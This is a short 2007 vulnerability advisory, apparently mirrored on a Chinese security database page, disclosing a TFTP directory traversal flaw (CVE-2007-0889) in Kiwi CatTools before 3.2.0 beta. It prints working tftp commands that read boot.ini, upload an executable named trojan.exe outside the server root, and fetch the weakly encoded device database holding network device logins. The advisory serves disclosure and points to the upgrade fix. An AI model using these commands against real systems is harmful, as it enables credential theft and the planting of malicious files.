TFTP directory traversal in Kiwi CatTools

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1053054 漏洞类型
发布时间 2007-02-14 更新时间 2007-02-14
CVE编号 CVE-2007-0889
漏洞平台 N/A CVSS评分 N/A
	TFTP directory traversal in Kiwi CatTools

Application : Kiwi CatTools prior to 3.2.0 beta
Release Date : 8 February 2007
Author : Nicob <nicob at>

Product :
========= :

"Kiwi CatTools is a freeware application that provides automated device
configuration management on routers, switches and firewalls."

A built-in TFTP server exists and a "encrypted device database" contains
IP addresses, logins and passwords for each configured device.

Vunerability :

TFTP directory traversal :

tftp -i GET a//..//..//..//..//..//boot.ini
tftp -i PUT foo.exe a//..//trojan.exe

Note : the device database is only protected by a reversible encoding
and can be remotely accessed with "GET a//..//..//kiwidb-cattools.kdb".

Solution :

Upgrade to version 3.2.0 beta or newer.